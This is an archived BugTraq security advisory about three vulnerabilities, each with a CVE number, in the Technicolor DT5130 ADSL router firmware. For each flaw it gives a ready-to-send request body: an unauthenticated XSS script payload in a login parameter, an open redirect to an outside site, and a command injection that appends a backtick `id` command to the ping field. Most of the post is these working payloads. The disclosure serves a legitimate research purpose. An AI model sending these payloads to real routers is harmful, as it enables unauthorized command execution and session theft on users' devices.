BugTraq
Wireless N ADSL 2/2+ Modem Router - DT5130 - Xss / URL Redirect / Command Injection Dec 03 2014 11:10AM
Ewerson Guimarães (Crash) - Dclabs (crash dclabs com br)
Product: Wireless N ADSL 2/2+ Modem Router
Firmware Version : V2.05.C29GV
Modem Type : ADSL2+ Router
Modem Vendor : Technicolor
Model: DT5130

Bugs:
1- Unauth Xss - CVE-2014-9142
user=teste&password=teste&
userlevel=15&refer=%2Fnigga.html&failrefer=/basicauth.cgi?index.html?fai
lrefer=<script></script><script>alert('TESTE')</script>"%0A&login=Login&
password=pass&refer=/index.html&user=teste&userlevel=15&login=Login

2- Arbitrari URL redirect - CVE-2014-9143
failrefer=http://blog.dclabs.com.br&login=Login&password=
pass&refer=/index.html&user=1&userlevel=15

3- Command Injection in ping field - CVE-2014-9144
setobject_token=SESSION_CONTRACT_TOKEN_TAG%3D0123456789012345&setobject_
ip=s1.3.6.1.4.1.283.1000.2.1.6.4.1.0%3Dwww.google.com.br|`id`&setobject_
ping=i1.3.6.1.4.1.283.1000.2.1.6.4.2.0%3D1&getobject_result=IGNORE

--
Ewerson Guimaraes (Crash)
Pentester/Researcher
DcLabs / Ibliss Security Team
www.dclabs.com.br / www.ibliss.com.br

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus